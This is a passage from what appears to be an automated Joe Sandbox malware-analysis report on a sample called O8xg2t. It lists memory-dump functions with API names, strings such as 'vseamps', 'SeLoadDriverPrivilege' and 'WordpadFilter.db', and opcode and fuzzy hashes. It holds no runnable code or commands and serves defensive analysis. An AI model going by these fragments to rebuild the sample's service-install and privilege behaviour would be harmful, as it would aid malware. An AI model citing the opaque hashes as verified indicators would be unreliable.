                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@
                                  • API String ID: 0-149943524
                                  • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                  • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                  • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                  • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                  • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                  • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                  • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: File$CreateReadmalloc
                                  • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                  • API String ID: 3950102678-3381721293
                                  • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                  • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                  • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                  • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                  • Instruction ID: 200ba1eaccdb56bb8a39e9f9c3ebab91d682492d5e843a2ac4e892f0bbe45b50
                                  • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                  • Instruction Fuzzy Hash: C58168B5E0834346FE54BF75D541A7B63A0AF45780F9C4036EA0E6F692DE2CF9498780

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                  • String ID: WordpadFilter.db
                                  • API String ID: 868324331-3647581008
                                  • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                  • Instruction ID: efc89471d09b85c4e495e240cf211d7dcb704c5374d01f5d9737b1d73c5383d6
                                  • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                  • Instruction Fuzzy Hash: 65318072B15B4189EB00EFB1D8406AE73B5EB98788F584635EE8D27B44EF38D555C380

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 73155330-0
                                  • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                  • Instruction ID: b5c6679d8abf1cf11a429dd6e243c46acffadc3ab6381ad13ab9c944b6361c89
                                  • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                  • Instruction Fuzzy Hash: 45816A76A1869246EA11AF35D8005BAA794FF56BC4F588335EF593B792DF3CF0928300
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                  • String ID:
                                  • API String ID: 3526400053-0
                                  • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                  • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                  • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                  • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                  • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                  • API String ID: 3408796845-4213300970
                                  • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                  • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                  • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                  • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                  • String ID: ampStopSingletone: logging ended
                                  • API String ID: 2048888615-3533855269
                                  • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                  • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                  • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                  • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                  • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                  • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                  • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ErrorLastManagerOpen$FileModuleName
                                  • String ID: /remove$/service$vseamps
                                  • API String ID: 67513587-3839141145
                                  • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                  • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                  • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                  • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                  • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                  • GetProcAddress.KERNEL32 ref: 000000014000F117
                                    • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressProc$Load$Library
                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                  • API String ID: 3981747205-232180764
                                  • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                  • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                  • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                  • String ID:
                                  • API String ID: 4284112124-0
                                  • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                  • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                  • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                  • String ID: vseamps
                                  • API String ID: 3693165506-3944098904
                                  • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                  • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                  • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileModuleName
                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                  • API String ID: 514040917-4022980321
                                  • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                  • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                  • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                  • String ID:
                                  • API String ID: 2057259594-0
                                  • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                  • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                  • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                  • String ID:
                                  • API String ID: 3103264659-0
                                  • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                  • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                  • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                  • String ID:
                                  • API String ID: 3140674995-0
                                  • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                  • Instruction ID: c09f5866895955077d0dde4ac92d8145ab44faf40904bb5ab03130ef3490085c
                                  • Instruction Fuzzy Hash: 81313EB2609B8186EB609F70E840BEE7375FB94744F88413ADA4E5BB94DF38D648C710
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 1269745586-0
                                  • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                  • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                  • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                  • String ID:
                                  • API String ID: 1239891234-0
                                  • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                  • Instruction ID: 4afa9733bd0a601e8ff2b8ecf524a7740c782461be4c4e5144c9758b0d8b4531
                                  • Instruction Fuzzy Hash: 35318F72618B8186DF60DF34E840AAE73A4FB88794F980136EA8D57B55DF3CD549CB00
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                  • String ID:
                                  • API String ID: 1445889803-0
                                  • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                  • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                  • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                  APIs
                                  • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                  • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                  • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                  • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContext
                                  • String ID:
                                  • API String ID: 2202868296-0
